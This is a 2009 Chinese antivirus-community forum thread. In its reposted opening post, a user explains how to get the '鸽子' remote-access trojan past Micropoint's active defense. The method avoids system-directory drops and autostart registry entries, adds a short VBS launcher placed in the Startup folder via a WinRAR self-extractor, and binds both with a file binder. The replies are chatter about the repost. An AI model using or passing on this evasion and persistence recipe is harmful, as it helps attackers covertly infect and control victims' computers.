微点交流论坛 - 主动防御 - 简单的写一下过微点主动防御（转帖）

微点交流论坛 » 主动防御 » 简单的写一下过微点主动防御（转帖）

御剑临风
禁止发言

威武大将军

积分 2135
发帖 2192
注册 2008-8-22

#1 简单的写一下过微点主动防御（转帖）

简单的写一下过微点主动防御
这篇文章，只是给大家提供一个很好的思路，请大家再去挖掘更多的方法，突破微点主动东防御，今天使用鸽子来突破微点的主动防御，现说下如何来配置鸽子
安装路径选择D盘！因为经过我测试，如果文件释放到，系统目录下，任何位置，如windows,或者system32微点都会报警，所以选择其他盘符，这样就不会报警。启动项设置，都不选择，让他留空，无论是写注册表或者写服务，都会报警，所以我们就不写,在填写高级选项，只选择隐藏进程。不能选择插入IE,，选择插入IE,微点同样会报警，接下来生成服务端。
这样生成的木马微点就不会报警了！但是有个问题！虽然可以上线，但是从新启动后，就不能加载程序了！因为我们没有选择启动方式。这里我们需要通过另外的一种方式来弥补这个问题！让木马从新启动后，能够正常的运行上线！
我们使用VBS 写一段代码，让他运行指定位置的EXE,也就是说运行我们释放到D盘里面的鸽子，代码如下
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("D:\iexplorer.exe -install 516 iloveyou",2)
接下来我们把这段代码用TXT文本改成VBS。我们用winrar自解压，让他释放到，C:\Documents and Settings\All Users\「开始」菜单\程序\启动这这个目录下，生成自解压的EXE,随便起名字，到了最后了！我们使用捆绑器将生成的鸽子和用winrar封装过的vbs，捆绑到一起。就实现了完美过微点主动防御的这么一个小的利用方法。

※ ※ ※ 本文纯属【御剑临风】个人意见，与【微点交流论坛】立场无关※ ※ ※

斩尽天下人
御剑临风天下归一
泱泱中华四海臣服
御剑临风唯我独尊

2009-3-6 03:04

mamsds
银牌会员

积分 1373
发帖 1360
注册 2008-3-15
来自乌克兰

#2

想试试，但是我都没有鸽子样本...............
哎.............
最好有高手试试

※ ※ ※ 本文纯属【mamsds】个人意见，与【微点交流论坛】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.

2009-3-6 07:03

jaber
版主

使用与技巧区版主

积分 2861
发帖 2835
注册 2006-6-6

#3

论坛有此贴了，发帖前能不能搜索下呢？

※ ※ ※ 本文纯属【jaber】个人意见，与【微点交流论坛】立场无关※ ※ ※

XP2（原版未打补丁）
单独微点预升级

2009-3-6 08:58

kkldv
新手上路

积分 37
发帖 37
注册 2009-2-8

#4

他这个人就是这个样
专门转别人的贴说是自己首发
见多了也就麻木了

※ ※ ※ 本文纯属【kkldv】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-3-6 11:03

kkldv
新手上路

积分 37
发帖 37
注册 2009-2-8

#5

哦
这回他写转帖二字了
还不错有长进了

※ ※ ※ 本文纯属【kkldv】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-3-6 11:05

yandac1
注册用户

积分 79
发帖 81
注册 2009-2-24

#6

有条件的试下吧。

※ ※ ※ 本文纯属【yandac1】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-3-6 11:40

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号